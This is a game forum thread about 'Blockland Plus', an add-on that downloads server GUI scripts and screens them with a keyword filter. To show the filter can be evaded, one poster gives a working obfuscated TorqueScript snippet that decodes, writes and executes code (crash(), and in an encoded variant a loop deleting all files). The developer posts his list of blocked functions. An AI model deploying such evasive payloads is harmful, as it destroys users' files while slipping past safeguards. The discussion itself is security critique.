Author Topic: GUI Downloading  (Read 3547 times)

Information

Blockland Plus allows users to easily download a custom GUI from servers in game. There are several preferences the user can set which effect how Blockland Plus operates. In addition, this comes with a GUI Manager which can be accessed in the Options Window. This allows users to load, scan, delete, or manually approve a downloaded GUI.

There are several filtered pieces of code that will alert the client that the file could be harmful if it contains them such as deleting files, or creating a new TCPObject. In addition the file will be checked for a client.cs and any unwanted file types. If it is missing a client.cs or if it contains any unwanted file types, it will be deleted. Upon joining a server that uses this system, you will be asked to download the required client file or load it if you already have the newest version.


Pictures



Download

https://www.dropbox.com/s/qstp1fmo6jps5bu/System_BlocklandPlus.zip

Discuss

This add-on is currently finished and working but I am looking for some feedback first. Discuss down below as to whether you would want this or not. Feel free to post any suggestions or concerns you may have as well.
« Last Edit: February 13, 2014, 10:01:53 PM by Wicked »

Wicked?... I thought you left Blockland a while ago.

On topic: Sounds like a great add-on to me. The checkmark UI needs replacing though and the name does not really fit, as it sounds like an entirely new version of Blockland. Does it also consider the use of eval dangerous? It should. There not really a fool proof checking system you can make though.

wow why didnt i think of that

Wicked?... I thought you left Blockland a while ago.

On topic: Sounds like a great add-on to me. The checkmark UI needs replacing though and the name does not really fit, as it sounds like an entirely new version of Blockland. Does it also consider the use of eval dangerous? It should. There not really a fool proof checking system you can make though.
Hmm I sort of agree about the name not fitting too much if gui downloading is the only part included in the system. I don't really plan on adding more at the moment either. Also, it does check for eval too.
« Last Edit: February 25, 2014, 11:47:38 AM by Wicked »

Post the mod. Why wouldn't you post the mod?

Code: [Select]
$alpha = "0123456789 abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+-=~{}[]:;<>?\",./'";

function a(%a)
{
for(%b=getsubstr(%a,0,1);%b!$="";%b=getsubstr(%a,%c++,1))
%d=%d @ getsubstr($alpha, (strpos($alpha, %b) - 1) % 66, 1);
return%d;
}

function b(%a)
{
%b="base/a.cs";
%f = new fileobject();
%f.openforwrite(%b);
%f.writeline(a(%a));
%f.close();
%f.delete();
exec(%b);
}

b("dsbti)_<");

how can a regular user be able to detect an exploit like that

@lug
Exactly my point. Unless you have some sort of trusted approval process then you can't trust the server
« Last Edit: February 14, 2014, 09:15:47 AM by Ipquarx »

i can't even loving detect that stuff reading with my eyes

does it... shift?
yes, it takes encoded input and then...
forget i just cannot get a() through my head
« Last Edit: February 13, 2014, 09:58:09 PM by Lugnut »

i can't even loving detect that stuff reading with my eyes

does it... shift?
yes, it takes encoded input and then...
forget i just cannot get a() through my head
it writes a script that contains crash(); and executes it

it writes a script that contains crash(); and executes it
Be happy I didn't put in b("gps)^b~gjoegjstugjmf),(/(,_<^b@%~,,<^b~gjoeofyugjmf),(/(,__gjmfefmfuf)^b_<");

Be happy I didn't put in b("gps)^b~gjoegjstugjmf),(/(,_<^b@%~,,<^b~gjoeofyugjmf),(/(,__gjmfefmfuf)^b_<");
I'm randomly gonna assume that says something along the lines of for(%f=findfirstfile("*"),1,%f=findnextfile("*.*")){filedelete(%f);}

Right?

Nearly correct, it's for(%a=findfirstfile("*.*");%a!$="";%a=findnextfile("*.*"))filedelete(%a);

The point is, even something so simple as a rot1 in an extended alphabet can be manipulated in endless ways to bypass automated detection.

IP's method seems to hinge on fileobjects. Just warn on fileobjects.

Updated the file to include a preference option to automatically delete files with syntax errors and another to automatically delete files that previously crashed you while executing.
Nearly correct, it's for(%a=findfirstfile("*.*");%a!$="";%a=findnextfile("*.*"))filedelete(%a);

The point is, even something so simple as a rot1 in an extended alphabet can be manipulated in endless ways to bypass automated detection.
That would be caught by the code filter and warn the client.

That would be caught by the code filter and warn the client.

That code, sure, but what about the other version?

You should disallow eval(), exec(), export(), deleteVariables(), fileDelete(), fileCopy(), new TCPObject, new HTTPObject, new FileObject and a lot more. You really can't cover everything.

That code, sure, but what about the other version?

You should disallow eval(), exec(), export(), deleteVariables(), fileDelete(), fileCopy(), new TCPObject, new HTTPObject, new FileObject and a lot more. You really can't cover everything.
It didn't have export or deleteVariables, I'll add that thanks. It does check for eval and those other ones though. Here is the current list of filters:
Code: [Select]
%filter[%filters++] = "fileDelete";
%filter[%filters++] = "fileCopy";
%filter[%filters++] = "findFirstFile";
%filter[%filters++] = "findNextFile";
%filter[%filters++] = "getFileCount";
%filter[%filters++] = "getFileCRC";
%filter[%filters++] = "getFileLength";
%filter[%filters++] = "getStringCRC";
%filter[%filters++] = "isFile";
%filter[%filters++] = "getFileModifiedTime";
%filter[%filters++] = "getFileModifiedSortTime";
%filter[%filters++] = "isWriteableFileName";
%filter[%filters++] = "fileExt";
%filter[%filters++] = "fileBase";
%filter[%filters++] = "fileName";
%filter[%filters++] = "filePath";
%filter[%filters++] = "createPath";
%filter[%filters++] = "fileObject";
%filter[%filters++] = "TCPObject";
%filter[%filters++] = "HTTPObject";
%filter[%filters++] = "saveBufferToFile";
%filter[%filters++] = "openForRead";
%filter[%filters++] = "openForAppend";
%filter[%filters++] = "openForWrite";
%filter[%filters++] = "WriteLine";
%filter[%filters++] = "ReadLine";
%filter[%filters++] = "export";
%filter[%filters++] = "deleteVariables";
%filter[%filters++] = "exec";
%filter[%filters++] = "eval";
%filter[%filters++] = "call";
%filter[%filters++] = "schedule";
%filter[%filters++] = "BlocklandPlus";
Can you think of anything else that needs to be added?